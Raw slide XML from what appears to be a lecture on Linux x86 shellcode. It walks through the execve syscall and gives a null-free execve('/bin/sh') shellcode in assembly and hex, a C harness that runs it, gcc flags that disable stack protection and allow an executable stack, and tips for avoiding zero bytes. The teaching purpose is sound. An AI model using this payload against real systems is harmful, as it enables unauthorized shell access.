          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1693960" y="5021004"/>
            <a:ext cx="6086281" cy="8382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800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”, 0, 0);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465C118B-7F9D-D744-B618-BBDEDB676CAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8575126" y="1947199"/>
            <a:ext cx="1743624" cy="838199"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -110292"/>
              <a:gd name="adj2" fmla="val 14353"/>
              <a:gd name="adj3" fmla="val 16667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</a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is 0xb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9563EB7B-9FEB-9A45-8F4F-52B2800CCD26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8195988" y="3429000"/>
            <a:ext cx="2501900" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -193178"/>
              <a:gd name="adj2" fmla="val -56872"/>
              <a:gd name="adj3" fmla="val 16667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</a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 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0 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecx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443618-4010-374E-86E6-28ABC526278E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6308209"/>
            <a:ext cx="10514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using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" err="1"/>
              <a:t>sysenter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> is faster and common approach for latest distributions, but this is the traditional explanation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BA01660-5774-2B4D-A427-7390BA6DB792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="140765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 spc="-50" normalizeH="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Cambria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Executing system call: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx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48999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1104E-7 2.7698E-6 L 2.81104E-7 0.135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7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58B126-ED82-A04D-BDD3-532BB555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39D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27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943CCE-F8B1-C947-AAEE-10A5BCA8AFD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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 spc="-50" normalizeH="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Cambria"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Shellcode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1A0094-84BD-764A-A2F1-8E17D86DEA50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="5712767"/>
            <a:ext cx="144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err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="240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D6A61CE-3970-3343-98BF-6F0756569175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3940870" y="2667000"/>
            <a:ext cx="5181600" cy="137160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da-DK" sz="2000">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x73\x68\x68\x2f\x62\x69\x6e\x89”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\xe3\xb0\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x80”;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857947-E07F-6E4D-820F-00F3EB6BFFD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="4191000"/>
            <a:ext cx="2484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Executable String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DCD18696-8A88-4644-8A89-6B8A2EB2B5BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1295400"/>
            <a:ext cx="3276600" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36607"/>
              <a:gd name="adj2" fmla="val 86507"/>
              <a:gd name="adj3" fmla="val 16667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Notice no NULL (\0) chars. Why?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34A58-E939-A54C-BD0E-5E488BCF6651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="6492875"/>
            <a:ext cx="7711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Author: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1"/>
              <a:t>kernel_panik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>, http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1"/>
              <a:t>www.shell-storm.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>/files/shellcode-752.php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D5DE879-6261-1340-8E18-019FBD0A2487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464110" y="1369367"/>
            <a:ext cx="3276600" cy="43434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err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>mul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>push %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2800"/>
              <a:t>push 0x68732f2f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>push 0x6e69622f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>mov %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" sz="2800" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="2800"/>
              <a:t> 0xb, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="2800" err="1"/>
              <a:t>al</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" sz="2800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2800" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2800"/>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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33268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811FCF-6A82-A440-96FC-7401D3B4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39D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28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CA49D0-864D-D541-90F5-9F128BF2F913}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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 spc="-50" normalizeH="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Cambria"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Shellcode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B390DF-700D-8F46-B480-057C8AF2026E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1524000"/>
            <a:ext cx="741869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>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>              "\x73\x68\x68\x2f\x62\x69\x6e\x89"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>              "\xe3\xb0\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x80";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> ("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> : %d bytes\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(*f)()=(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(*)())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> f();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Single Corner Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53D720A5-53A9-4443-94BC-7183C41C5D60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6579326" y="4930246"/>
            <a:ext cx="4422789" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -o shellcode -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-stack-protector </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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BFDD4-4F34-3943-9F08-D64876A4EB1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="101600" y="6367046"/>
            <a:ext cx="7711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Author: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1"/>
              <a:t>kernel_panik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>, http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1"/>
              <a:t>www.shell-storm.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>/files/shellcode-752.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34706731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0F162-DD72-45FD-9B0D-322AEB01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Shellcode with Zero-bytes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396C9-B77D-4FC1-AD78-1B9D2EE00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push $0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This will not be accepted by functions such as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin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</a:rPr>
              <a:t>scanf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</a:rPr>
              <a:t>strcpy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  <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fgets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6E8D3-3B62-5448-95F4-1D1D97D57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550" y="2363550"/>
            <a:ext cx="68961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95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0F162-DD72-45FD-9B0D-322AEB01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Shellcode with Zero-bytes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396C9-B77D-4FC1-AD78-1B9D2EE00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You still need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>ZEROs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> for your code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Do do you create and use ZEROs?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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C20C38-1D30-BC46-9013-B095B4BB9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1690688"/>
            <a:ext cx="5829300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80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86BFA1-625D-6F4D-8A12-88E9FB9A9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35" y="4682596"/>
            <a:ext cx="3276600" cy="1482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C61A9E-8313-764C-A5F0-64CB4B882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32971"/>
            <a:ext cx="4514851" cy="14825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DC0954-87CE-AA4B-85F7-6CB4579B7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343" y="1577597"/>
            <a:ext cx="5105401" cy="14534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C0F162-DD72-45FD-9B0D-322AEB01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Shellcode with Zero-bytes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396C9-B77D-4FC1-AD78-1B9D2EE00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14851" cy="1205442"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $0x41414141,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endParaRPr lang="en-US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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sub $0x41414141,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endParaRPr lang="en-US">
